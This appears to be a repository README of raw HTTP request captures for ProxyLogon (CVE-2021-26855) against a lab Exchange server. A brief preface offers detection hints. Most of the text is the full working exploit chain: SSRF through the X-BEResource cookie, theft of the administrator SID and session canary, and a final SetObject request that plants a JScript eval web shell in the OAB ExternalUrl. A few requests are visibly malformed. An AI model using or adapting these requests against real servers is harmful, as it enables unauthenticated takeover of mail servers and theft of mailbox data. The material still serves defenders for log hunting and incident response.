
MacAsure/cve-2021-26855


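cve-2021-26855

Request captures for CVE-2021-26855, the Microsoft Exchange Server server-side request forgery known as ProxyLogon, apparently taken against a lab server (private addresses throughout). Microsoft shipped fixes in the March 2021 Exchange Server security updates. Each request below goes to a static-looking path under /ecp/ and carries an X-BEResource cookie naming a backend host and path, which is the pattern to search for in the Exchange frontend proxy logs. The last request writes a server-side script block into the OAB virtual directory's ExternalUrl, so an ExternalUrl containing `<script` indicates the server needs incident response and not only patching.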

GET /ecp/x.png HTTP/1.1
Host: 192.168.170.134
Cookie: X-BEResource=localhost~1942062522
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?10
Te: trailers
Connection: close
# Get the DN value

POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?; X-BEResource=EXCHANGE01/autodiscover/autodiscover.xml?a=~1942062522
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Content-Type: text/xml
Content-Length: 343
Connection: close

<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>lili@xihongdream.com</EMailAddress>
                <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>



/o=xihongdream/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=e9bf522287a54c07ba1b9a9439f081bc-lili
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=Administrator@EXCHANGE01.xihongdream.com:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
X-Clientinfo: {2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}
X-Clientapplication: Outlook/15.0.4815.1002
X-Requestid: {E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456
X-Requesttype: Connect
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/mapi-http
Content-Length: 142
Connection: close

/o=xihongdream/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=e9bf522287a54c07ba1b9a9439f081bc-lili


S-1-5-21-2706396224-3788800485-1262849735-3585
# Get the session and msExchEcpCanary

POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=Administrator@EXCHANGE01.xihongdream.com:444/ecp/proxyLogon.ecp#~1942062522;
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: text/xml; charset=utf-8
Content-Length: 83
Connection: close

<r at="Negotiate" ln=""><s>S-1-5-21-2706396224-3788800485-1262849735-3585</s></r>


ASP.NET_SessionId=c897b0d2-4bc1-40ce-a449-9d65d43276e9;
msExchEcpCanary=jwpquzNMEEyRaXH6LhHEJBqGxCzwG9sIO7BTgjy0e4DxjF0s6fVmLcP-InroQca6cPxscclNbS0.;

-----------------
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=@EXCHANGE01:444/ecp/proxyLogon.ecp#~1942062522;
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: text/xml; charset=utf-8
Content-Length: 348
Connection: close

<r at="Negotiate" ln=""><s>S-1-5-21-2706396224-3788800485-1262849735-500</s></r>


-----------------
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=Administrator@EXCHANGE01.xihongdream:444/ecp/proxyLogon.ecp#~1942062522;
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-20
Content-Type: text/xml; charset=utf-8
Content-Length: 348
Connection: close

<r at="Negotiate" ln="john"><s>S-1-5-21-2706396224-3788800485-1262849735-5529</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r>
# Get the OAB id

POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=X-BEResource=@EXCHANGE01:444/ecp/DDI/DDIService.svc/GetList?schema=VirtualDirectory&msExchEcpCanary={msExchEcpCanary}&#~1942062522; ASP.NET_SessionId={sessid}; msExchEcpCanary={msExchEcpCanary};
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/json; charset=utf-8
Content-Length: 244
Connection: close

{"filter":  
    {"Parameters":  
        {  
            "__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",  
            "SelectedView": "",  
            "SelectedVDirType": "OAB"  
        }  
    }  
}


-----------------------------------

POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=X-BEResource=@EXCHANGE01:444/ecp/DDI/DDIService.svc/GetList?schema=VirtualDirectory&msExchEcpCanary={msExchEcpCanary}&#~1942062522; ASP.NET_SessionId={sessid}; msExchEcpCanary={msExchEcpCanary};
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/json; charset=utf-8
Content-Length: 244
Connection: close

{"filter":  
    {"Parameters":  
        {  
            "__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",  
            "SelectedView": "",  
            "SelectedVDirType": "OAB"  
        }  
    }  
}

----------------------------

POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=Administrator@EXCHANGE01:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary={msExchEcpCanary}&a=~1942062522; ASP.NET_SessionId={sessid}; msExchEcpCanary={msExchEcpCanary};
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/json; charset=utf-8
Content-Length: 244
Connection: close

{  
    "filter": {  
        "Parameters": {  
            "__type":  
            "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",  
            "SelectedView": "",  
            "SelectedVDirType": "All"  
        }  
    },  
    "sort": {}  
}
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
X-BEResource=@EXCHANGE01:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary={msExchEcpCanary}&#~1941962754; ASP.NET_SessionId={sessid}; msExchEcpCanary={msExchEcpCanary};
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/json; charset=utf-8
Content-Length: 244
Connection: close

{  
    "identity": {  
        "__type": "Identity:ECP",  
        "DisplayName": "OAB (Default Web Site)",  
        "RawIdentity": oabid  
    },  
    "properties": {  
        "Parameters": {  
            "__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",  
            "ExternalUrl": f"http://x/#<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["api"],"unsafe");}</script>"  
        }  
    }  
}
